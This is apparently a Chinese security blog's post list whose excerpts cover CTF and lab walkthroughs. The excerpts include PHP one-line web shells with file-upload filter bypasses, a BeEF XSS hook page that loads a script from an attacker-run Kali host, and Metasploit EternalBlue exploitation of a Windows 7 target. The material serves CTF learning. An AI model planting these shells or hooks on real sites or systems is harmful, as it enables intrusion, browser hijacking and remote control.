- 博客(14)
- 收藏
- 关注
RSS订阅原创 kali下载beef-xss及利用
1.beef-xss下载使用apt-get update 更新kali(不是管理员用户前面加sudo)apt-get install beef-xss 下载beef(不是管理员用户前面加sudo)2.利用启动输入命令beef-xsshttp://kaliip:3000/ui/panel打开登录页面构建一个简单的xss html页面<html><head><script src='http://kaliip:3000/hook.js'></
2021-12-15 08:24:11
1827
2
原创 buuctf 后门查杀 1
1.下载并解压文件。2.右击文件夹选择火绒进行杀毒(其它杀毒软件都可以)3.点击详情4。打开文件夹位置5.使用记事本或者php编译工具打开文件。flag{6ac45fb83b3bc355c024f5034b947dd3}
2021-12-07 17:09:07
495
原创 buuctf[ACTF2020 新生赛]Upload 1
1.打开题目,先上传一句话木马试试。<script language='php'>@eval($_POST['love']);</script>按照传统方法,现将一句话木马利用windows文件后缀识别的特点,将后缀名改为图片后缀名。 上传,抓包改包!改为phtml后缀上传成功,构架url用蚁剑连接。http://5081ca11-6534-49bf-8f3b-94c45fc9946e.node4.buuoj.cn:81/uplo4d/38a64fe21fe9be
2021-12-06 22:18:29
684
原创 BUUCTF——[极客大挑战 2019]Upload 1
1.打开后发现是文件上传题构建一句话木马<?php @eval($_POST['shy']);?>将一句话木马改成jpg文件尝试上传。抓包改成php提示文件包含<?,那么我们有思路了,上传图片的时候还扫描了图片头,将一句话木马加图片头2.然后和一步骤一样上传...
2021-12-04 22:41:45
2688
原创 kali安装PowerSploit
PowerSploit的安装1.使用命令git clone https://github.com/PowerShellMafia/PowerSploit从github下载文件。2.使用命令service apache2 start启动apache服务。3.将下载好的文件移动到var/www/html下注意:自己下载的文件路径可能不一样,要按照自己的来。4.重启apacheservice apache2 start,自己kali的ip/PowerSploit/进入目标页面比如192.168.5.1
2021-11-19 08:14:35
2951
原创 kali使用msf渗透测试靶机
kali利用metasploit使用ms17-010(永恒之蓝)渗透靶机windones7免责声明:只用于靶机测试1.渗透之前要关闭windones7和主机的防火墙及杀毒软件。2.使用nmap扫描windones73.445端口开放,说明有ms17-010的漏洞。4.使用命令msfconsole打开msf5.使用search ms17-010命令查找攻击模块6.使用exploit/windows/smb/ms17_010_eternalblue模块攻击use选择7.show options
2021-11-18 10:43:39
1267
1
原创 BUUCTF misc 二维码1解题思路
BUUCTF misc 二维码1解题思路1题目2打开后发现是一个二维码,首先我们将它放到010中分析发现藏有pk开头的压缩包,然后我们使用kali把压缩包分离出来 dd if=QR_code.png of=flag.zip skip=471 bs=1发现要密码打开我们使用工具fcrackzip(直接在kali中输入fcrackzip就下载好了)进行暴力破解.fcrackzip -b -c1 -l 4 -u flag.zip 破解出
2021-07-01 11:43:37
2860
2
原创 kali配置更新源及软件更新
kali配置源配置apt命令在线安装包的源为国源#中科大kali源(2021)deb http://mirrors.ustc.edu.cn/kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali-rolling main non-free contrib1.vim打开etc下的apt命令vim /etc/apt/sources.list(i键可以在kali中插入内容)用#关闭原有的中科大的源(如图)
2021-05-13 17:15:55
378
1
原创 网络信息安全攻防平台第六题
网络信息安全攻防平台第六题题目:异常数据分值: 200小明今天去妹纸家开Party,而妹纸却给他出了一个谜语,说只要他能答出来,她就会答应小明一个要求.这是妹纸给小明的谜语序列:AGV5IULSB3ZLVSE=Tips:key就是解密结果当看到AGV5IULSB3ZLVSE=这个后面的等于号时,首先想到的就是base64加密,但base64加密不可能全部为大写,我们将首字母改为小写试试.然后浏览器随便打开一个base64解密工具.运气正好一遍就解密出来了.然后我们得到了解密结果hey!Il
2021-04-22 09:52:21
407
原创 网络信息安全攻防平台—基础题第三题
网络信息安全攻防平台-----基础题第三题猜猜这是经过了多少次加密?这是一道解密题,目测是base64编码,编码最后面是=号,应该是一道base64解密题.我们可以在浏览器中搜base64编码解码工具,网络上有一大堆,但是效率太慢了,所以我们可以用python写个脚本解码(其它语言也可以),代码如下:import base64a=0s='base64编码内容'try: while True: s=base64.standard_b64decode(s) a=a+1except:
2021-03-16 23:04:59
465
3
转载 2020-12-29
Web基础知识【从零入门】——HTTP基础知识[转载] HTTP基础知识1 HTTP介绍HTTP协议(HyperText Transfer Protocol,超文本传输协议)是用于从WWW服务器传输超文本到本地浏览器的传送协议。它的发展是万维网协会(World Wide Web Consortium)和Internet工作小组IETF(Internet Engineering Task Force)合作的结果。它可以使浏览器更加高效,使网络传输减少。它不仅保证计算机正确快速地传输超文本文档,还确定
2020-12-29 11:58:03
86
原创 2020-12-23
攻防世界—web新手区cookie题目描述:X老师告诉小宁他在cookie里放了些东西,小宁疑惑地想:‘这是夹心饼干的意思吗?’解题:我们需要先打开web开发者工具中的网络,点击重新加载。之后在地址栏中输入/cookie.php,刷新。后在消息头中可以找到flag。...
2020-12-23 19:18:28
107
原创 攻防世界web简单cookie
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表*如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Ma
2020-12-22 11:48:04
716
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人